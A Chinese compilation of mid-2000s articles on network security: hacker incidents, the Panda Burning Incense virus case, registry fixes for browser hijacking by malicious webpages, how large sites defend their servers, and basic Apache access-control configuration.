“招安”网络黑客，网络安全为哪般？

“招安”网络黑客，网络安全为哪般？

作者：qgzg 　来源：赛迪网

经过记者努力，近日辗转联系到“黑客攻击百度”事件的一位知情人士。“沉溺技术的人不了解媒体的力量，trail（化名）的第一反应是相当惊讶。”据他透露，公众和媒体对此事的高度关注已超出百度攻击者——黑客Ttrail的预期。目前Ttrail正相当焦虑，担心此事将导致的法律后果。

在这个事件中，更让公众惊讶的是百度的技术防范为何不堪攻击？难道拿着工资吃公司饭的技术工程师们，真的敌不过那些来无影去无踪的黑客们？或许是应了一句俗话：明枪易躲，暗箭难防。既然黑客们的暗箭如此厉害，为何正规网站不“招安”他们。所谓的“招安”是有成本的，但有时候成本比损失更合算。

也在近日，有媒体报道广东发展银行客户黄颜菲（化名）为支付购房款，在自己的银行账户里存入了14万元。然而就在一夜之间，14万元的存款被神秘人通过网上支付全部花光。 其间，广发银行工作人员发现由于网上交易输入密码错误次数太多，黄颜菲的广发行信用卡已被冻结。既然信用卡已被发现有异并被冻结，然后被网上盗用到底是谁的责任？

作为银行部门提供的网上服务，第一重要的肯定是安全问题。如果安全没有保障，客户还把钱存进银行做什么？况且黄颜菲回忆说，她的取款密码从未在网上使用过。当然，不排除熟人作案的可能性，但也不能排除网上黑客作案的可能性。而最根本的症结是，银行的网上服务在帐户冻结后依然还能进行网上支付业务，难道这不是一种问题吗？

还是说到百度遭受的有史以来最大的不明身份黑客攻击事件，一个有着专业技术团队的搜索网站，其搜索服务竟然在全国各地出现近30分钟的故障。就算不去指责技术工程师们的无能，但他们疏于防范的网络安全意识肯定有问题。而这种症结，恰恰通过黑客的攻击行为达到完善，从而为他们找到了技术不足的弊端。

据悉，攻击百度的并非其认为的“大规模且组织精心策划”的行为。又有一个疑问产生了，当黑客攻击行为发生后，百度竟然判断不出攻击者的规模及手段。而攻击者Trail还相当年轻，却是一个有多年黑客从业经历的技术高手。让这样一个高手流落民间，我们只能为百度感到遗憾。其实百度请公安机关介入调查知道真相后，应该自惭形秽。

更让百度感到惭愧的是，它面对公众的形象越来越糟糕。很多人曾为百度作为中文搜索的老大而自豪，但如今它却利用自己的技术和垄断地位打压客户。不知道这是百度有意为之的策略，还是像广东发展银行一样——事后愿意提供紧急商业贷款或适当援助。但对黄颜菲夫妇来说，他们失去的仅仅是14万元现金吗？他们还会信任银行吗？

据黄颜菲透露，在她身边的几位朋友听说了她的经历后，关闭了自己银行卡的网上银行业务。而银行工作人员表示，“根据我们的经验，有人通过暴力破解的方法破解我们密码的可能性很小。”他们只说可能性很小，并不是否认完全没有可能性。而百度从不正面回答客户的质疑，而是选择沉默。百度的沉默，可能会像银行一样遭遇“信任危机”。

当客户的信任感被践踏后，第一感觉肯定是愤怒与无奈，还有无辜。面对千万个客户组成的弱势群体，其群体效应恐怕就是毁灭性的。这个道理，相信百度和广发银行都会明白的。他们要做的，就是如何使网上服务更安全，更透明，也更公正！而需要的措施是，广发银行需要更高明的黑客提供服务，百度需要“招安”黑客哪怕仅仅是提供一些建议。

如果广发银行意识到了这一点，那么其网络服务的安全性就有可能进步。而百度意识到了黑客的重要性，并不只是单一地通过法律惩治解决问题，它的网络安全与技术保障也才可能更进一步。不是还有句俗话说：“以其人之道还治其人之身”。当广发银行或百度公司都找到了问题的症结，利用破坏者或攻击者的逆性思维精心整治，或许是网民们最希望看到的。

看看大网站到底是如何保障网络安全的

作者：pcbird98　来源：赛迪网

首先，服务器上用的是私有的操作系统和数据库，所谓私有，并不是完全自己写，而是说，全部都是进行私有化改造过的，一般使用开源的操作系统和数据库进行改造，比如说操作系统使用free bsd的改，数据库使用mysql的改，网站服务器数量上百时开始实施这个工程的网站比较多，费用是很重要的一方面原因，但更重要的是安全因素。防火墙不仅昂贵，而且会严重降低效率，所以他们一般不会考虑。

改造操作系统的时候，除通信所需的一些命令文件保持原名外，很多命令文件连文件名都换掉(有人认为这是小花样，呵呵)，大量功能被重写，黑客即使拿到权限坐在服务器面前，也取不到数据。

有网站首席安全官认为放一扇门让别人一个劲砸，不如给人两条路让人选择正确的或者不正确的，所有使用错误帐号和密码去试系统的人，都会被允许以匿名身份登陆到一个shell里，那个shell跟真的系统很象，嗯，只是很象，但其实是个空壳，所有的指令，都会被以最小代价运行，调用假的信息界面出来。有的甚至里面放了陷阱，欺骗性引导黑客自动送上身份资料或其他一些敏感信息，毕竟黑客可能通过境外跳板过来，如果不是黑客主动送上，网站方很难获得黑客身份资料的。

使用自己的安全策略，对已有的攻击手段都有相应的防护措施。比如说对syn flood这样的，就是临时降低服务质量，降低半连接等待时间，这样连接的成功率会降低，但是不会造成服务被停。

网络空闲时间经常有欺骗性数据流在办公网络和服务器之间流动，使用强度不高的加密方式加密，让黑客有事做。

网站内部工作人员使用业务系统登陆网站服务器时，界面上和一般服务器一样，所有的一般命令都可以通过业务系统转换为私有操作系统的专用命令而得到执行，网站内部工作人员也只有很少的知道转换的对照，而且一般都经过分权，做操作系统开发的，不负责服务器的维护，并且不知道安装某个内部版本号操作系统的服务器被部署到什么地方。

帐号及密码按规定必须通过安全的消息平台传递。

有自己部署在不同城市的DNS服务器，所有部署出去的应用都有不在同一机房的备用系统，应急机制设置在自己的DNS服务器这一环节，使用承载其他服务的服务器做交叉的安全状态监测，比如说A1服务器是A服务器的备用系统，使用CDEFGH等服务器来做A服务器安全状态监测，定时通信，并向A1服务器传递通信成功的信号，当失败率超过某个值的时候，A1自动分担A的部分压力，A1服务器上原本承担的非及时服务(不面向客户的，比如说索引服务)被降低优先级。所有服务器之间这么相互监测，通过某个机制保证监测是及时有效的。这样的情况下，即使某家DNS服务商被攻击，自己的网站都还能被大部分用户访问，因为不同地区的DNS还没被刷，用户还是可以使用那些DNS连接到网站的。

一般而言，使用了这些手段，网站的安全性不能说万无一失，也是大大提高的。

网络安全：常见恶意网页中招现象及防范

[b]网络安全：常见恶意网页中招现象及防范 [/b]

作者：pcbird98　来源：赛迪网

[url=http://chapi.go2.icpcn.com/firefox.htm][img]http://chapi.go2.icpcn.com/images/fbanner.gif[/img][/url]

1.禁止使用电脑

现象描述:尽管网络流氓们用这一招的不多，但是一旦你中招了，后果真是不堪设想!浏览了含有这种恶意代码的网页其后果是:"关闭系统"、"运行"、"注销"、注册表编辑器、DOS程序、运行任何程序被禁止，系统无法进入"实模式"、驱动器被隐藏。

解决办法:一般来说上述八大现象你都遇上了的话，基本上系统就给"废"了，建议重装。

2.格式化硬盘

现象描述:这类恶意代码的特征就是利用IE执行ActiveX的功能，让你无意中格式化自己的硬盘。只要你浏览了含有它的网页，浏览器就会弹出一个警告说"当前的页面含有不安全的ctiveX，可能会对你造成危害"，问你是否执行。如果你选择"是"的话，硬盘就会被快速格式化，因为格式化时窗口是最小化的，你可能根本就没注意，等发现时已悔之晚矣。

解决办法:除非你知道自己是在做什么，否则不要随便回答"是"。该提示信息还可以被修改，如改成"Windows正在删除本机的临时文件，是否继续"，所以千万要注意!此外，将计算机上Format.com、Fdisk.exe、Del.exe、Deltree.exe等命令改名也是一个办法。

3.下载运行木马程序

现象描述:在网页上浏览也会中木马?当然，由于IE5.0本身的漏洞，使这样的新式入侵手法成为可能，方法就是利用了微软的可以嵌入exe文件的eml文件的漏洞，将木马放在eml文件里，然后用一段恶意代码指向它。上网者浏览到该恶意网页，就会在不知不觉中下载了木马并执行，其间居然没有任何提示和警告!

解决办法:第一个办法是升级您的IE5.0，IE5.0以上版本没这毛病;此外，安装瑞星2006、Norton等

病毒防火墙，它会把网页木马当作病毒迅速查截杀。

4. 注册表的锁定

现象描述:有时浏览了恶意网页后系统被修改，想要用Regedit更改时，却发现系统提示你没有权限运行该程序，然后让你联系管理员。晕了!动了我的东西还不让改，这是哪门子的道理!

解决办法:能够修改注册表的又不止Regedit一个，找一个注册表编辑器，例如:Reghance。将注册表中的 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 下的DWORD值"DisableRegistryTools"键值恢复为"0"，即可恢复注册表。

5.默认主页修改

现象描述:一些网站为了提高自己的访问量和做广告宣传，利用IE的漏洞，将访问者的IE不由分说地进行修改。一般改掉你的起始页和默认主页，为了不让你改回去，甚至将IE选项中的默认主页按钮变为失效的灰色。不愧是网络流氓的一惯做风。

解决办法:

(1).起始页的修改。展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。同理，展开注册表到HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Main，在右半部分窗口中将"Start Page"的键值改为"about:blank"即可。

注意:有时进行了以上步骤后仍然没有生效，估计是有程序加载到了启动项的缘故，就算修改了，下次启动时也会自动运行程序，将上述设置改回来，解决方法如下:

运行注册表编辑器Regedit.exe，然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Run主键，然后将下面的"registry.exe"子键(名字不固定)删除，最后删除硬盘里的同名可执行程序。退出注册编辑器，重新启动计算机，问题就解决了。

(2).默认主页的修改。运行注册表编辑器，展开HKEY_LOCAL_MACHINE\Software\Microsoft\ Internet Explorer\Main\，将Default-Page-URL子键的键值中的那些恶意网站的网址改正，或者设置为IE的默认值。

(3).IE选项按钮失效。运行注册表编辑器，将HKEY_CURRENT_USER\Software\Policies\ Microsoft\Internet Explorer\Control Panel中的DWORD值"Settings"=dword:1、"Links"=dword:1、"SecAddSites"=dword:1全部改为"0"，将HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值"homepage"的键值改为"0"。

6.篡改IE标题栏

现象描述:在系统默认状态下，由应用程序本身来提供标题栏的信息。但是，有些网络流氓为了达到广告宣传的目的，将串值"Windows Title"下的键值改为其网站名或更多的广告信息，从而达到改变IE标题栏的目的。非要别人看他的东西，而且是通过非法的修改手段，除了"无耻"两个字，再没有其它形容词了。

解决办法:展开注册表到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\下，在右半部分窗口找到串值"Windows Title"，将该串值删除。重新启动计算机。

7.篡改默认搜索引擎

现象描述:在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到网络注氓想要你去的网站。

解决办法:运行注册表编辑器，依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\ Internet Explorer\Search\SearchAssistant,将CustomizeSearch及SearchAssistant的键值改为某个搜索引擎的网址即可。

8.IE右键修改

现象描述:有的网络流氓为了宣传的目的，将你的右键弹出的功能菜单进行了修改，并且加入了一些乱七八糟的东西，甚至为了禁止你下载，将IE窗口中单击右键的功能都屏蔽掉。

解决办法:

(1).右键菜单被修改。打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt，删除相关的广告条文。

(2).右键功能失效。打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Policies\ Microsoft\Internet Explorer\Restrictions，将其DWORD值"NoBrowserContextMenu"的值改为0。

9.篡改地址栏文字

现象描述:中招者的IE地址栏下方出现一些莫名其妙的文字和图标，地址栏里的下拉框里也有大量的地址，并不是你以前访问过的。

解决办法:

(1).地址栏下的文字。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ToolBar下找到键值LinksFolderName，将其中的内容删去即可。

(2).地址栏中无用的地址。在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypeURLs中删除无用的键值即可。

10.启动时弹出对话框

现象描述:1.系统启动时弹出对话框，通常是一些广告信息，例如欢迎访问某某网站等等。2.开机弹出网页，通常会弹出很多窗口，让你措手不及，恶毒一点的，可以重复弹出窗口直到死机。

解决办法:

(1).弹出对话框。打开注册表编辑器，找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Winlogon主键，然后在右边窗口中找到"LegalNoticeCaption"和 "LegalNoticeText"这两个字符串，删除这两个字符串就可以解决在启动时出现提示框的现象了。

(2).弹出网页。点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为url、html、htm的网址文件都勾掉。

11.IE窗口定时弹出

现象描述:中招者的机器每隔一段时间就弹出IE窗口，地址指向网络流氓的个人主页。不晓得是不是网络流氓以为这样你就会经常光顾?

解决办法:点击"开始-运行-输入msconfig",选择"启动"，把里面后缀为hta的都勾掉，重启。

[url=http://chapi.go2.icpcn.com/firefox.htm][img]http://chapi.go2.icpcn.com/images/firefox.gif[/img][/url]

别忙着给“熊猫烧香”乱戴帽子

别忙着给“熊猫烧香”乱戴帽子

“熊猫烧香”的作者终于被抓了，对所有的网友来说是一个好消息，公安部门终于快速而高效的完成了一项看起来无法完成任务。但是纵观所有的报道，我们不难发现很多重要问题没有得到解决，所以给“熊猫烧香”戴各种帽子是不合时宜的。

可能的帽子之一：“熊猫烧香”借病毒牟取暴利。

如果是牟取暴利的话，那么改可执行文件的图标那就是最愚笨的手法。毕竟那样太容易被发现了，真正的窃取密码自然是希望能感染了用户也毫无察觉，至于卖源代码那能值多少钱。从这点把“熊猫烧香”作为内核的窃取密码的兄弟们似乎智商有点低。这个帽子带来更大的问题是，“熊猫烧香”具有如此破坏力，那些隐性的窃取各种密码的木马和病毒现在是什么情况，那些制作隐性木马和病毒的人抓得到吗？

可能的帽子之二：“熊猫烧香”高明的技术手段。

熊猫烧香被破获后，《京华时报》采访了一些技术高手，瑞星公司反病毒工程师说，病毒作者并无高明的技术手段，与“专业寻找网络漏洞”的黑客高手难以相提并论。某黑客介绍，目前流行的包括熊猫烧香在内的多种木马病毒，均采用2006年发现的微软IE浏览器的一个漏洞，利用这种漏洞，只要用户访问特定网站，就自动下载木马。反病毒高手mopery称，在2006年1月份，他们曾推断，武汉男孩已把病毒销售给多人，由于每个人包装时采用的技术不同，造成熊猫拥有不同的“外衣”。综上看来“熊猫烧香”手段确实不算高明，但是不高明的手段能造成如此大的伤害，不高明的手段就能让防病毒厂商不能提前预防。所以笔者认为高明不高明，那是针对防病毒、防木马技术的，“熊猫烧香”不高明手段只能反映出防病毒、防木马技术的低下。

可能的帽子之三：“熊猫烧香”背后的黑色产业链。

把“熊猫烧香”与黑色产业链挂上关系确实不错，不过黑色产业链如果仅仅挣10万，卖卖病毒源代码、收几个窃取密码的徒弟、开个病毒网站收点会费那好像跟产业就挂不上钩了。笔者认为，如果病毒后面没有企业运作，就几个人来折腾那就称不上产业链。从这点看，“熊猫烧香”跟流氓软件比起来，那是小打小闹，顶多属于流窜犯。但是黑色产业链有没有，笔者相信自然是有的，谁能在病毒，木马中获得更高的企业利益，那就有可能是这个产业链的一份子。那些用病毒、木马进行知名度传播的企业，提升流量骗取点击…………，这些才是黑色产业链的源头。源头不除，抓几个流窜犯那是没有太大用处的。当然此次熊猫烧香中，《京华日报》的记者能快速找到黑客进行采访，黑客网站的现实存在，这些也说明了黑客的普及，未来监管黑客的道路漫长。

相比于“熊猫烧香”的危害，笔者认为以下几点疑惑的隐患那就更大了。

1.高技术人员如何管理。从“熊猫烧香”看出，其实其技术水平不能算高超，技术高手大有人在，至少反病毒专家那绝对是高手。我们不能指望着这些高技术人员用自我约束去进行管理，一旦自我约束消失，那造成的危害将不可估量。所以对高技术人员的管理比起抓获偶尔出现的几个所谓天才那才是更需要关注的事情，但是这方面的东西却很少提起。

2.破获技术的低技术含量。从报道中来看，如果“熊猫烧香”的作者不是到处推销自己的源代码，公安机关很难从外围收网抓住作者本人。所以这种侦破方式，对于类似QQ木马等就很难抓住了。“熊猫烧香”那是全国关注，所以投入物力人力不少，最后得以抓获，但是这种方式不适合所有的病毒和木马。所以提升破获的技术含量，用最少的资源去破获，才是可行之道。虽然有些强人所难。

3.“熊猫烧香”的传播途径是怎样的。笔者认为熊猫烧香是如何传播开的，这点非常重要。也许是报道中很少涉及，但是传播途径中至少可以让用户尽量避免被传播。随着互联网的进步，病毒传播途径多样化，如果还是让网民不要上不良网站，不要下载不良的内容和不安全邮件的老三样，那才不是避免之道。

4.“熊猫烧香”对国外有没有影响。中国已经是开放的国度，“熊猫烧香”是否流传到国外也是验证“熊猫烧香”到底有多少技术水准的标志。给我的感觉就是国外病毒在中国都比较猖狂，国内病毒要能在国外猖狂那也挺好。

熊猫不再烧香，流氓们呢？

熊猫烧香病毒的作者终于被抓住了。充分表明，我们的侦查机关还是具备这种能力的。当然，也与这个病毒的作者太猖狂有一定的关系。必竟把自己的名字写到病毒程序里是一件非常不安全的事情，这是用脚后跟也能够想出来的。

　　实际上，有些流氓软件的作法，比这位病毒的作者高明不到哪里去。他们都是有名有姓的公司，有些甚至是大公司，他们为什么有恃无恐？关键原因还在于病毒作者只是个人而已，而流氓软件的作者却是一个个有公关能力和反扑能力的公司。

　　允许流氓继续耍流氓，而熊猫不能再烧香，恐怕是另外一个版本的“只许州官放火，不许百姓点灯”吧。

熊猫主人落网用户找谁索赔

罗会祥

【eNet特约评论】“熊猫烧香”的作者落网，新闻媒体和业内人士所聚焦的，已不是那位悬赏10万美元缉凶的“施主”是否兑现，而是“熊猫烧香”背后的黑色产业链。

　　病毒猖獗得肆无忌惮，甚至形成一条完整的产业链，实在是不可思议。当法律审判病毒制造嫌疑人之际，我们应不应当拷问，杀毒公司该当何罪？

　　“熊猫烧香”危害剧烈，数以万计的用户和网站深受其害，面对QQ号、虚拟财产、银行卡号被盗，用户的杀毒软件竟然无可奈何，怎能不让人大失所望！

　　杀毒软件实在是令人失望，早在三年前，业内就质疑杀毒软件的模式，纯粹是滞后的“过期药”。每一次新病毒大面积爆发之后，杀毒厂商总是争先恐后地宣布自己第一个捕捉到病毒，并最先打上了“补丁”。杀毒厂商都是事后诸葛亮，杀毒软件都是马后炮，公安部的一份“病毒疫情调查分析报告”显示，重复感染3次以上的用户高达57.07%，主要原因是因为杀毒软件对新病毒反应的滞后导致重复感染。杀毒软件只能预防过去的病毒，对未知的新病毒毫无作用，哪天会中毒，用户不知道，防不胜防。

　　由于机制的滞后和思维的缺陷，面对新的病毒，竞争对手之间不是以用户的利益为重，而是互相打压，争夺市场。准确地说，杀毒厂商发的就是病毒财，黑客没有“罢工”，病毒继续升级，杀毒软件的商机就越多，商业利润也就越大。而如果不仅恶意炒作病毒，甚至大炒“病毒经济”，杀毒软件已占到国内软件总销售额的40%以上。从这个角度看，杀毒产业的价值体系本身就是病态的。

　　用户花钱买正版，而且一次次续费升级，倒头来连亡羊补牢也无济于事。年复一年，用户都处于不断升级的疲惫应付之中，一直在被杀毒厂商牵着鼻子走。中毒之后，系统瘫痪，数据丢失，财产被盗，杀毒厂商竟然完全不负责任。

　　试问，用户蒙受巨大损失，应不应该向杀毒厂商索赔？追究谁是病毒的制造者，那是公安部门的事，与用户无关。用户只要买了正版软件，杀毒厂商就应当为用户的安全承担责任，用户也只能向杀毒软件厂商索赔。

　　为此，国家有关部门应当规范杀毒产业。

　　首先，建立杀毒软件失效追究制。计算机网络安全已成为信息社会的最大隐患，无论企业还是个人，如果电脑感染后数据全部丢失，无疑于遭受一场灭顶之灾，尤其是那些具有知识产权或含金量高的数据，其损失更不是可以用金钱来计算的。国家对网络安全的投资每年约为数百亿人民币，系统软件和杀毒软件都获取了丰厚的利润，对于病毒所造成的损失，必须追究相关厂商的负责。

　　其次，转变杀毒产业的思维模式。杀毒公司必须转变思路：杀毒为主，重在预防。用户对杀毒软件的最基本要求是，提供可靠的安全保障，而不是无休无止的升级——升级——再升级。国际反病毒技术的主攻方向是查杀未知病毒，而且已有杀毒厂商在努力。杀毒产业的变革，将颠覆原来的机制，如果被动固守现有盈利模式，一旦“预杀毒技术”成为推动产业发展的动力，那些亡羊补牢的杀毒厂商必遭淘汰。

熊猫烧香”引发企业信息化的安全危机

作者：allrunyyb　来源：赛迪网

“熊猫烧香”病毒火了，“熊猫烧香”病毒红了，它在三根香的虔诚祈祷下，迅速攀升到全国各大新闻媒体和互联网各大网站的“头版头条”，成为家喻户晓的明星毒王。

“熊猫烧香”只是众多病毒中的典型代表，在过去的2006，危害性很高的病毒们如“洪水猛兽”般的袭击了脆弱的企业信息化安全防线，病毒不但能损坏用户的计算机系统，还能进一步造成网络瘫痪、文件和数据的丢失，给企业造成了巨大的经济损失。

此时业内专家和杀毒软件商们纷纷站出来发表言论，声称我国大部分企业缺乏最基本的网络安全防范知识和安全防范意识，给病毒大规模的传播带来可乘之机。此言不差，但拥有众多的反病毒专利技术和“国际领先水平”的杀毒软件商们在病毒面前也是不堪一击，总是在病毒大规模爆发这后“专杀工具”才终于姗姗来迟，这让广大的企业如何来防范，如何来避免呢？正所谓的道高一尺，魔高一丈。

办公自动化（OA）做为企业信息化中重要的部分，是企业正常运营不可缺少的一部分；在此次的病毒大爆发也使众多基于WINDOWS平台的办公自动化（OA）产品纷纷瘫痪和崩溃，致使企业在人力、物力、资金上都付出了巨大的代价；其中自有企业本身安全防范的不周和疏忽，也有办公自动化（OA）产品自身安全防范方案的不足和缺陷。

泛东房地产协同管理系统拥有强大的安全保障体系；其LINUX版本可以直接在LINUX平台下使用，完全摆脱众多WINDOWS病毒的侵犯和损坏；在WINDOWS平台下其WINDOWS版本接合自有的SYSTRON®产品为用户提供了一揽子安全解决方案。

泛东房地产协同管理系统真正实现了房地产企业的办公现代化、信息资源化、传输网络化和决策科学化的信息系统，并拥有安全保障体系确保系统的安全、信息安全和应用安全。

熊猫烧香电脑病毒案在仙桃告破

　今年1月中旬，湖北省仙桃市公安局网监部门根据公安部公共信息网络安全监察局及省公安厅的统一部署，对“熊猫烧香”病毒的制作者开展调查。经查，熊猫烧香病毒的制作者为湖北省武汉市李俊，据李俊交代，其于2006年10月16日编写了“熊猫烧香”病毒并在网上广泛传播，并且还以自己出售和由他人代卖的方式，在网络上将该病毒销售给120余人，非法获利10万余元。经病毒购买者进一步传播，导致该病毒的各种变种在网上大面积传播，对互联网用户计算机安全造成了严重破坏。李俊还于2003年编写了“武汉男生”病毒、2005年编写了“武汉男生2005”病毒及“ＱＱ尾巴”病毒。另外，本案另有几个重要犯罪嫌疑人雷磊（男，25岁，武汉新洲区人）、王磊（男，22岁，山东威海人）、叶培新（男，21岁，浙江温州人）、张顺（男，23岁，浙江丽水人）通过改写、传播“熊猫烧香”等病毒，构建“僵尸网络”，通过盗窃各种游戏和ＱＱ账号等方式非法牟利。

　　目前，李俊、雷磊等5名犯罪嫌疑人已被刑事拘留。

　　到目前为止，警方未在任何网站正式发布由犯罪嫌疑人李俊编写的“熊猫烧香”病毒专杀工具，请网民勿盲目下载使用。(犯罪嫌疑人李俊编写的“熊猫烧香”病毒专杀工具将在通过鉴定后，择日予以发布，供网民下载。)

Apache服务器配置安全规范及其缺陷

Apache服务器配置安全规范及其缺陷

正如我们前言所说尽管Apache服务器应用最为广泛，设计上非常安全的程序。但是同其它应用程序一样，Apache也存在安全缺陷。毕竟它是完全源代码，Apache服务器的安全缺陷主要是使用HTTP协议进行的拒绝服务攻击(denial of service)、缓冲区溢出攻击以及被攻击者获得root权限三缺陷和最新的恶意的攻击者进行“拒绝服务”(DoS)攻击。合理的网络配置能够保护Apache服务器免遭多种攻击。我们来介绍一下主要的安全缺陷。

主要安全缺陷

（1）使用HTTP协议进行的拒绝服务攻击(denial of service)的安全缺陷

这种方法攻击者会通过某些手段使服务器拒绝对HTTP应答。这样会使Apache对系统资源(CPU时间和内存)需求的剧增，最终造成Apache系统变慢甚至完全瘫痪。

（2）缓冲区溢出的安全缺陷

该方法攻击者利用程序编写的一些缺陷，使程序偏离正常的流程。程序使用静态分配的内存保存请求数据，攻击者就可以发送一个超长请求使缓冲区溢出。

（3）被攻击者获得root权限的安全缺陷

该安全缺陷主要是因为Apache服务器一般以root权限运行(父进程)，攻击者会通过它获得root权限，进而控制整个Apache系统。

（4）恶意的攻击者进行“拒绝服务”(DoS)攻击的安全缺陷

这个最新在6月17日发现的漏洞，它主要是存在于Apache的chunk encoding中，这是一个HTTP协议定义的用于接受web用户所提交数据的功能。 所有说使用最高和最新安全版本对于加强Apache Web服务器的安全是至关重要的。

正确维护和配置Apache服务器

虽然Apache服务器的开发者非常注重安全性，由于Apache服务器其庞大的项目， 难免会存在安全隐患。正确维护和配置Apache WEB服务器就很重要了。我们应注意的一些问题：

（1）Apache服务器配置文件

Apache Web服务器主要有三个配置文件，位于/usr/local/apache/conf目录下。 这三个文件是：

httpd.conf----->主配置文件

srm.conf------>填加资源文件

access.conf--->设置文件的访问权限

（2）Apache服务器的目录安全认证

在Apache Server中是允许使用 .htaccess做目录安全保护的，欲读取这保护的目录需要先键入正确用户帐号与密码。这样可做为专门管理网页存放的目录或做为会员区等。在保护的目录放置一个档案，档名为.htaccss。

AuthName "会员专区"

AuthType "Basic"

AuthUserFile "/var/tmp/xxx.pw" ----->把password放在网站外 require valid-user 到apache/bin目录，建password档 % ./htpasswd -c /var/tmp/xxx.pw username1 ----->第一次建档要用参数"-c" % /htpasswd /var/tmp/xxx.pw username2 这样就可以保护目录内的内容，进入要用合法的用户。

注：采用了Apache内附的模组。

也可以采用在httpd.conf中加入：　

options　indexes　followsymlinks　

allowoverride　authconfig　

order　allow,deny　

allow　from　all　

（3）Apache服务器访问控制

我们就要看三个配置文件中的第三个文件了，即access.conf文件，它包含一些指令控制允许什么用户访问Apache目录。应该把deny from all设为初始化指令，再使用allow from指令打开访问权限。

order deny,allow

deny from all

allow from safechina.net　　

设置允许来自某个域、IP地址或者IP段的访问。

（4）Apache服务器的密码保护问题

我们再使用.htaccess文件把某个目录的访问权限赋予某个用户。系统管理员需要在httpd.conf或者rm.conf文件中使用 AccessFileName指令打开目录的访问控制。如：

AuthName PrivateFiles

AuthType Basic

AuthUserFile /path/to/httpd/users

require Phoenix

# htpasswd -c /path/to/httpd/users Phoenix

设置Apache服务器的WEB和文件服务器

我们在Apache服务器上存放WEB服务器的文件，供用户访问，并设置/home/ftp/pub目录为文件存放区域，用http://download.your.com/pub/来访问。在防火墙上设置apache反向代理技术，由防火墙代理访问。　

（1）Apache服务器的设置　

Apache服务器采用默认配置。主目录为/home/httpd/html,主机域名为Phoenix.your.com, 且别名到www.your.com中,　并且设置srm.conf加一行别名定义如下：

Alias　/pub　/home/ftp/pub/　

更改默认应用程序类型定义如下：　

DefaultType　application/octet-stream　

最后在/etc/httpd/conf/access.conf中增加一项定义

　

Options　Indexes　

AllowOverride　AuthConfig　

order　allow,deny　

allow　from　all　

注：Options　Indexes允许在找不到index.html文件的情况下允许列出目录/文件列表。AllowOverride　AuthConfig允许做基本的用户名和口令验证。这样的话，需要在/home/ftp/pub目录下放入.htaccess，内容如下：　

　　[root@　pub]#　more　.htaccess　

　　AuthName　Branch　Office　Public　Software　Download　Area　

　　AuthType　Basic　

　　AuthUserFile　/etc/.usrpasswd　

　　require　valid-user　

用# htpasswd　-c　/etc/.usrpasswd　user1　 分别创建不同的允许访问/pub下文件服务的外部用户名和口令。

（2）在防火墙上配置反向代理技术.

在/etc/httpd/conf/httpd.conf　 中加入 NameVirtualHost　xxx.xxx.xxx.xxx #　xxx.xxx.xxx.xxx ----->是防火墙外部在互联网上永久IP地址：　

　　servername　www.your.com　

　　errorlog　/var/log/httpd/error_log　

　　transferlog　/var/log/httpd/access_log　

　　rewriteengine　on　

　　proxyrequests　off　

　　usecanonicalname　off　

　　rewriterule　^/(.*)$　http://xxx.xxx.xx.x/$1　Apache服务器的IP地址。

　　servername　http://download.your.com/pub/

　　errorlog　/var/log/httpd/download/error_log　

　　transferlog　/var/log/httpd/download/access_log　

　　rewriteengine　on　

　　proxyrequests　off　

　　usecanonicalname　off　

　　rewriterule　^/(.*)$　http://xxx.xxx.xx.x/$1　同上Apache服务器的IP地址。

设置防火墙上的DNS，让download.your.com和www.your.com 都指向防火墙的外部网地址xxx.xxx.xxx.xxx。

用http://www.your.com访问主页，用http://download.your.com/pub/访问公共文件的下载区。

注：还需要在apache服务器主机上建立目录/var/log/httpd/download/，否则会出错。另外，也可以设置防火墙主机上的/home/httpd/html/index.html的属性为750来阻止访问，这是防外部用户能访问到防火墙上的Apache服务器的http://www.your.com中。　

总结：Apache Server是一个非常优秀，非常棒的服务器，只要你正确配置和维护好Apache服务器，你就会感受到Apache Server 所带来的好处，同样希望你能够通过阅读本文达到理论和实践双丰收的目的。

验证你的Apache来源途径

不要以为在Google上能够搜索到合适的Apache版本。如果你需要下载最新版本的Apache，那么你最好通过一个权威的镜像站点来下载。然而，即使这样也可能有问题，事实上，曾经就有黑客入侵过apache.org官方网站。所以，采用类似PGP的工具来验证Apache的数字签名就显得尤为重要。

保持更新Apache的补丁程序

如果你安装了Apache，你就必须及时更新安全补丁。如果没有及时的更新，那你的系统很容易受到网络上那些高危病毒的攻击。幸好，有几个简便方法可以更新Apache的补丁。参考我们关于保持更新Apache补丁的文章了解更多关于Apache服务器公告列表、Linux包管理系统和RedHat操作系统更新服务的信息。

避免使用.htaccess文件（分布式配置文件）

很多情况下需要几个管理员和内容管理者共同管理Apache服务器。一个常用的共享管理办法就是使用.htaccess文件，这样可以很灵活地对管理员以外的用户提供不同的配置控制权限。然而，这些文件也使得在集中安全管理之外还有相当多的安全控制权限——这些文件允许安全专业人士以外的其他用户改变服务器的访问控制许可配置。那些对粒度访问控制根本不熟悉的用户修改的配置可能在无意中会危害到你的系统安全。所以，除非必须使用，否则我们应该尽可能地避免使用这种访问控制系统。

监视系统日志

